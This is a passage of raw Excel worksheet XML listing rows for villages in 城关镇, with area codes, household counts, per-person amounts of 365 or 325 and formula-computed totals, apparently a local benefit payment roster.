      </c>
      <c r="B565" s="24" t="str">
        <f>B564</f>
        <v>城关镇</v>
      </c>
      <c r="C565" s="24" t="str">
        <f>C564</f>
        <v>城关镇北外村</v>
      </c>
      <c r="D565" s="31" t="s">
        <v>1574</v>
      </c>
      <c r="E565" s="31" t="s">
        <v>606</v>
      </c>
      <c r="F565" s="24" t="str">
        <f>F564</f>
        <v>4113210102</v>
      </c>
      <c r="G565" s="24"/>
      <c r="H565" s="24"/>
      <c r="I565" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J565" s="24"/>
      <c r="K565" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="566" customHeight="1" spans="1:11">
      <c r="A566" s="23" t="s">
        <v>1575</v>
      </c>
      <c r="B566" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C566" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D566" s="24" t="s">
        <v>1576</v>
      </c>
      <c r="E566" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F566" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G566" s="24">
        <v>1</v>
      </c>
      <c r="H566" s="25">
        <v>365</v>
      </c>
      <c r="I566" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J566" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K566" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="567" customHeight="1" spans="1:11">
      <c r="A567" s="23" t="s">
        <v>1577</v>
      </c>
      <c r="B567" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C567" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D567" s="24" t="s">
        <v>1578</v>
      </c>
      <c r="E567" s="24" t="s">
        <v>1579</v>
      </c>
      <c r="F567" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G567" s="24">
        <v>1</v>
      </c>
      <c r="H567" s="25">
        <v>365</v>
      </c>
      <c r="I567" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J567" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K567" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="568" customHeight="1" spans="1:11">
      <c r="A568" s="23" t="s">
        <v>1580</v>
      </c>
      <c r="B568" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C568" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D568" s="24" t="s">
        <v>1581</v>
      </c>
      <c r="E568" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F568" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G568" s="24">
        <v>1</v>
      </c>
      <c r="H568" s="25">
        <v>365</v>
      </c>
      <c r="I568" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J568" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K568" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="569" customHeight="1" spans="1:11">
      <c r="A569" s="23" t="s">
        <v>1582</v>
      </c>
      <c r="B569" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C569" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D569" s="24" t="s">
        <v>1583</v>
      </c>
      <c r="E569" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F569" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G569" s="24">
        <v>1</v>
      </c>
      <c r="H569" s="25">
        <v>365</v>
      </c>
      <c r="I569" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J569" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K569" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="570" customHeight="1" spans="1:11">
      <c r="A570" s="23" t="s">
        <v>1584</v>
      </c>
      <c r="B570" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C570" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D570" s="24" t="s">
        <v>1585</v>
      </c>
      <c r="E570" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F570" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G570" s="24">
        <v>1</v>
      </c>
      <c r="H570" s="25">
        <v>365</v>
      </c>
      <c r="I570" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J570" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K570" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="571" customHeight="1" spans="1:11">
      <c r="A571" s="23" t="s">
        <v>1586</v>
      </c>
      <c r="B571" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C571" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D571" s="24" t="s">
        <v>1587</v>
      </c>
      <c r="E571" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F571" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G571" s="24">
        <v>1</v>
      </c>
      <c r="H571" s="25">
        <v>365</v>
      </c>
      <c r="I571" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J571" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K571" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="572" customHeight="1" spans="1:11">
      <c r="A572" s="23" t="s">
        <v>1588</v>
      </c>
      <c r="B572" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C572" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D572" s="24" t="s">
        <v>1589</v>
      </c>
      <c r="E572" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F572" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G572" s="24">
        <v>1</v>
      </c>
      <c r="H572" s="25">
        <v>365</v>
      </c>
      <c r="I572" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J572" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K572" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="573" customHeight="1" spans="1:11">
      <c r="A573" s="23" t="s">
        <v>1590</v>
      </c>
      <c r="B573" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C573" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D573" s="24" t="s">
        <v>1591</v>
      </c>
      <c r="E573" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F573" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G573" s="24">
        <v>1</v>
      </c>
      <c r="H573" s="25">
        <v>365</v>
      </c>
      <c r="I573" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J573" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K573" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="574" customHeight="1" spans="1:11">
      <c r="A574" s="23" t="s">
        <v>1592</v>
      </c>
      <c r="B574" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C574" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D574" s="24" t="s">
        <v>1593</v>
      </c>
      <c r="E574" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F574" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G574" s="24">
        <v>1</v>
      </c>
      <c r="H574" s="25">
        <v>365</v>
      </c>
      <c r="I574" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J574" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K574" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="575" customHeight="1" spans="1:11">
      <c r="A575" s="23" t="s">
        <v>1594</v>
      </c>
      <c r="B575" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C575" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D575" s="24" t="s">
        <v>1595</v>
      </c>
      <c r="E575" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F575" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G575" s="24">
        <v>2</v>
      </c>
      <c r="H575" s="25">
        <v>325</v>
      </c>
      <c r="I575" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J575" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K575" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="576" customHeight="1" spans="1:11">
      <c r="A576" s="23" t="s">
        <v>1596</v>
      </c>
      <c r="B576" s="24" t="str">
        <f>B575</f>
        <v>城关镇</v>
      </c>
      <c r="C576" s="24" t="str">
        <f>C575</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D576" s="31" t="s">
        <v>1597</v>
      </c>
      <c r="E576" s="31" t="s">
        <v>416</v>
      </c>
      <c r="F576" s="24" t="str">
        <f>F575</f>
        <v>4113210103</v>
      </c>
      <c r="G576" s="24"/>
      <c r="H576" s="24"/>
      <c r="I576" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J576" s="24"/>
      <c r="K576" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="577" customHeight="1" spans="1:11">
      <c r="A577" s="23" t="s">
        <v>1598</v>
      </c>
      <c r="B577" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C577" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D577" s="24" t="s">
        <v>1599</v>
      </c>
      <c r="E577" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F577" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G577" s="24">
        <v>2</v>
      </c>
      <c r="H577" s="25">
        <v>325</v>
      </c>
      <c r="I577" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J577" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K577" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="578" customHeight="1" spans="1:11">
      <c r="A578" s="23" t="s">
        <v>1600</v>
      </c>
      <c r="B578" s="24" t="str">
        <f>B577</f>
        <v>城关镇</v>
      </c>
      <c r="C578" s="24" t="str">
        <f>C577</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D578" s="31" t="s">
        <v>1601</v>
      </c>
      <c r="E578" s="31" t="s">
        <v>1602</v>
      </c>
      <c r="F578" s="24" t="str">
        <f>F577</f>
        <v>4113210103</v>
      </c>
      <c r="G578" s="24"/>
      <c r="H578" s="24"/>
      <c r="I578" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J578" s="24"/>
      <c r="K578" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="579" customHeight="1" spans="1:11">
      <c r="A579" s="23" t="s">
        <v>1603</v>
      </c>
      <c r="B579" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C579" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D579" s="24" t="s">
        <v>1604</v>
      </c>
      <c r="E579" s="24" t="s">
        <v>869</v>
      </c>
      <c r="F579" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G579" s="24">
        <v>2</v>
      </c>
      <c r="H579" s="25">
        <v>325</v>
      </c>
      <c r="I579" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J579" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K579" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="580" customHeight="1" spans="1:11">
      <c r="A580" s="23" t="s">
        <v>1605</v>
      </c>
      <c r="B580" s="24" t="str">
        <f>B579</f>
        <v>城关镇</v>
      </c>
      <c r="C580" s="24" t="str">
        <f>C579</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D580" s="31" t="s">
        <v>1606</v>
      </c>
      <c r="E580" s="31" t="s">
        <v>432</v>
      </c>
      <c r="F580" s="24" t="str">
        <f>F579</f>
        <v>4113210103</v>
      </c>
      <c r="G580" s="24"/>
      <c r="H580" s="24"/>
      <c r="I580" s="24">
        <f t="shared" ref="I580:I643" si="9">H580*G580</f>
        <v>0</v>
      </c>
      <c r="J580" s="24"/>
      <c r="K580" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="581" customHeight="1" spans="1:11">
      <c r="A581" s="23" t="s">
        <v>1607</v>
      </c>
      <c r="B581" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C581" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D581" s="24" t="s">
        <v>1608</v>
      </c>
      <c r="E581" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F581" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G581" s="24">
        <v>2</v>
      </c>
      <c r="H581" s="25">
        <v>325</v>
      </c>
      <c r="I581" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J581" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K581" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="582" customHeight="1" spans="1:11">
      <c r="A582" s="23" t="s">
        <v>1609</v>
      </c>
      <c r="B582" s="24" t="str">
        <f>B581</f>
        <v>城关镇</v>
      </c>
      <c r="C582" s="24" t="str">
        <f>C581</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D582" s="31" t="s">
        <v>1610</v>
      </c>
      <c r="E582" s="31" t="s">
        <v>1611</v>
      </c>
      <c r="F582" s="24" t="str">
        <f>F581</f>
        <v>4113210106</v>
      </c>
      <c r="G582" s="24"/>
      <c r="H582" s="24"/>
      <c r="I582" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J582" s="24"/>
      <c r="K582" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="583" customHeight="1" spans="1:11">
      <c r="A583" s="23" t="s">
        <v>1612</v>
      </c>
      <c r="B583" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C583" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D583" s="24" t="s">
        <v>1613</v>
      </c>
      <c r="E583" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F583" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G583" s="24">
        <v>1</v>
      </c>
      <c r="H583" s="25">
        <v>365</v>
      </c>
      <c r="I583" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J583" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K583" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="584" customHeight="1" spans="1:11">
      <c r="A584" s="23" t="s">
        <v>1614</v>
      </c>
      <c r="B584" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C584" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D584" s="24" t="s">
        <v>1615</v>
      </c>
      <c r="E584" s="24" t="s">
        <v>765</v>
      </c>
      <c r="F584" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G584" s="24">
        <v>1</v>
      </c>
      <c r="H584" s="25">
        <v>365</v>
      </c>
      <c r="I584" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J584" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K584" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="585" customHeight="1" spans="1:11">
      <c r="A585" s="23" t="s">
        <v>1616</v>
      </c>
      <c r="B585" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C585" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D585" s="24" t="s">
        <v>1617</v>
      </c>
      <c r="E585" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F585" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G585" s="24">
        <v>1</v>
      </c>
      <c r="H585" s="25">
        <v>365</v>
      </c>
      <c r="I585" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J585" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K585" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="586" customHeight="1" spans="1:11">
      <c r="A586" s="23" t="s">
        <v>1618</v>
      </c>
      <c r="B586" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C586" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D586" s="24" t="s">
        <v>1619</v>
      </c>
      <c r="E586" s="24" t="s">
        <v>543</v>
      </c>
      <c r="F586" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G586" s="24">
        <v>2</v>
      </c>
      <c r="H586" s="25">
        <v>325</v>
      </c>
      <c r="I586" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J586" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K586" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="587" customHeight="1" spans="1:11">
      <c r="A587" s="23" t="s">
        <v>1620</v>
      </c>
      <c r="B587" s="24" t="str">
        <f>B586</f>
        <v>城关镇</v>
      </c>
      <c r="C587" s="24" t="str">
        <f>C586</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D587" s="30" t="s">
        <v>1621</v>
      </c>
      <c r="E587" s="30" t="s">
        <v>1622</v>
      </c>
      <c r="F587" s="24" t="str">
        <f>F586</f>
        <v>4113210106</v>
      </c>
      <c r="G587" s="24"/>
      <c r="H587" s="24"/>
      <c r="I587" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J587" s="24"/>
      <c r="K587" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="588" customHeight="1" spans="1:11">
      <c r="A588" s="23" t="s">
        <v>1623</v>
      </c>
      <c r="B588" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C588" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D588" s="24" t="s">
        <v>1624</v>
      </c>
      <c r="E588" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F588" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G588" s="24">
        <v>1</v>
      </c>
      <c r="H588" s="25">
        <v>365</v>
      </c>
      <c r="I588" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J588" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K588" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="589" customHeight="1" spans="1:11">
      <c r="A589" s="23" t="s">
        <v>1625</v>
      </c>
      <c r="B589" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C589" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D589" s="24" t="s">
        <v>1626</v>
      </c>
      <c r="E589" s="24" t="s">
        <v>540</v>
      </c>
      <c r="F589" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G589" s="24">
        <v>1</v>
      </c>
      <c r="H589" s="25">
        <v>365</v>
      </c>
      <c r="I589" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J589" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K589" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="590" customHeight="1" spans="1:11">
      <c r="A590" s="23" t="s">
        <v>1627</v>
      </c>
      <c r="B590" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C590" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D590" s="24" t="s">
        <v>1628</v>
      </c>
      <c r="E590" s="24" t="s">
        <v>1629</v>
      </c>
      <c r="F590" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G590" s="24">
        <v>1</v>
      </c>
      <c r="H590" s="25">
        <v>365</v>
      </c>
      <c r="I590" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J590" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K590" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="591" customHeight="1" spans="1:11">
      <c r="A591" s="23" t="s">
        <v>1630</v>
      </c>
      <c r="B591" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C591" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D591" s="24" t="s">
        <v>1631</v>
      </c>
      <c r="E591" s="24" t="s">
        <v>1632</v>
      </c>
      <c r="F591" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G591" s="24">
        <v>1</v>
      </c>
      <c r="H591" s="25">
        <v>365</v>
      </c>
      <c r="I591" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J591" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K591" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="592" customHeight="1" spans="1:11">
      <c r="A592" s="23" t="s">
        <v>1633</v>
      </c>
      <c r="B592" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C592" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D592" s="24" t="s">
        <v>1634</v>
      </c>
      <c r="E592" s="24" t="s">
        <v>1276</v>
      </c>
      <c r="F592" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G592" s="24">
        <v>1</v>
      </c>
      <c r="H592" s="25">
        <v>365</v>
      </c>
      <c r="I592" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J592" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K592" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="593" customHeight="1" spans="1:12">
      <c r="A593" s="23" t="s">
        <v>1635</v>
      </c>
      <c r="B593" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C593" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D593" s="24" t="s">
        <v>1636</v>
      </c>
      <c r="E593" s="24" t="s">
        <v>1637</v>
      </c>
      <c r="F593" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G593" s="24">
        <v>1</v>
      </c>
      <c r="H593" s="25">
        <v>365</v>
      </c>
      <c r="I593" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J593" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K593" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="594" customHeight="1" spans="1:12">
      <c r="A594" s="23" t="s">
        <v>1638</v>
      </c>
      <c r="B594" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C594" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D594" s="24" t="s">
        <v>1639</v>
      </c>
      <c r="E594" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F594" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G594" s="24">
        <v>1</v>
      </c>
      <c r="H594" s="25">
        <v>365</v>
      </c>
      <c r="I594" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J594" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K594" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="595" customHeight="1" spans="1:12">
      <c r="A595" s="23" t="s">
        <v>1640</v>
      </c>
      <c r="B595" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C595" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D595" s="24" t="s">
        <v>1641</v>
      </c>
      <c r="E595" s="24" t="s">
        <v>1642</v>
      </c>
      <c r="F595" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G595" s="24">
        <v>1</v>
      </c>
      <c r="H595" s="25">
        <v>365</v>
      </c>
      <c r="I595" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J595" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K595" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="596" customHeight="1" spans="1:12">
      <c r="A596" s="23" t="s">
        <v>1643</v>
      </c>
      <c r="B596" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C596" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D596" s="24" t="s">
        <v>1644</v>
      </c>
      <c r="E596" s="24" t="s">
        <v>1645</v>
      </c>
      <c r="F596" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G596" s="24">
        <v>1</v>
      </c>
      <c r="H596" s="25">
        <v>365</v>
      </c>
      <c r="I596" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J596" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K596" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="597" customHeight="1" spans="1:12">
      <c r="A597" s="23" t="s">
        <v>1646</v>
      </c>
      <c r="B597" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C597" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D597" s="24" t="s">
        <v>1647</v>
      </c>
      <c r="E597" s="24" t="s">
        <v>1648</v>
      </c>
      <c r="F597" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G597" s="24">
        <v>1</v>
      </c>
      <c r="H597" s="25">
        <v>365</v>
      </c>
      <c r="I597" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J597" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K597" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="598" customHeight="1" spans="1:12">
      <c r="A598" s="23" t="s">
        <v>1649</v>
      </c>
      <c r="B598" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C598" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D598" s="24" t="s">
        <v>1650</v>
      </c>
      <c r="E598" s="24" t="s">
        <v>1651</v>
      </c>
      <c r="F598" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G598" s="24">
        <v>2</v>
      </c>
      <c r="H598" s="25">
        <v>325</v>
      </c>
      <c r="I598" s="24">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J598" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K598" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="599" customHeight="1" spans="1:12">
      <c r="A599" s="23" t="s">
        <v>1652</v>
      </c>
      <c r="B599" s="24" t="str">
        <f>B598</f>
        <v>城关镇</v>
      </c>
      <c r="C599" s="24" t="str">
        <f>C598</f>
        <v>西北村</v>
      </c>
      <c r="D599" s="31" t="s">
        <v>1653</v>
      </c>
      <c r="E599" s="31" t="s">
        <v>1654</v>
      </c>
      <c r="F599" s="24" t="str">
        <f>F598</f>
        <v>4113210106</v>
      </c>
      <c r="G599" s="24"/>
      <c r="H599" s="24"/>
      <c r="I599" s="24">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="J599" s="24"/>
      <c r="K599" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="600" customHeight="1" spans="1:12">
      <c r="A600" s="23" t="s">
        <v>1655</v>
      </c>
      <c r="B600" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C600" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D600" s="24" t="s">
        <v>1656</v>
      </c>
      <c r="E600" s="24" t="s">
        <v>869</v>
      </c>
      <c r="F600" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G600" s="24">
        <v>1</v>
      </c>
      <c r="H600" s="25">
        <v>365</v>
      </c>
      <c r="I600" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J600" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K600" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="601" customHeight="1" spans="1:12">
      <c r="A601" s="23" t="s">
        <v>1657</v>
      </c>
      <c r="B601" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C601" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D601" s="24" t="s">
        <v>1658</v>
      </c>
      <c r="E601" s="24" t="s">
        <v>360</v>
      </c>
      <c r="F601" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G601" s="24">
        <v>1</v>
      </c>
      <c r="H601" s="25">
        <v>365</v>
      </c>
      <c r="I601" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J601" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K601" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="602" customHeight="1" spans="1:12">
      <c r="A602" s="23" t="s">
        <v>1659</v>
      </c>
      <c r="B602" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C602" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D602" s="24" t="s">
        <v>1660</v>
      </c>
      <c r="E602" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F602" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G602" s="24">
        <v>1</v>
      </c>
      <c r="H602" s="25">
        <v>365</v>
      </c>
      <c r="I602" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J602" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K602" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="603" customHeight="1" spans="1:12">
      <c r="A603" s="23" t="s">
        <v>1661</v>
      </c>
      <c r="B603" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C603" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D603" s="24" t="s">
        <v>1662</v>
      </c>
      <c r="E603" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F603" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G603" s="24">
        <v>1</v>
      </c>
      <c r="H603" s="25">
        <v>365</v>
      </c>
      <c r="I603" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J603" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K603" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="604" customHeight="1" spans="1:12">
      <c r="A604" s="23" t="s">
        <v>1663</v>
      </c>
      <c r="B604" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C604" s="24" t="s">
        <v>1209</v>
      </c>
      <c r="D604" s="24" t="s">
        <v>1664</v>
      </c>
      <c r="E604" s="24" t="s">
        <v>1665</v>
      </c>
      <c r="F604" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G604" s="24">
        <v>1</v>
      </c>
      <c r="H604" s="25">
        <v>365</v>
      </c>
      <c r="I604" s="24">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J604" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K604" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="605" customHeight="1" spans="1:12">
      <c r="A605" s="23" t="s">
        <v>1666</v>
      </c>
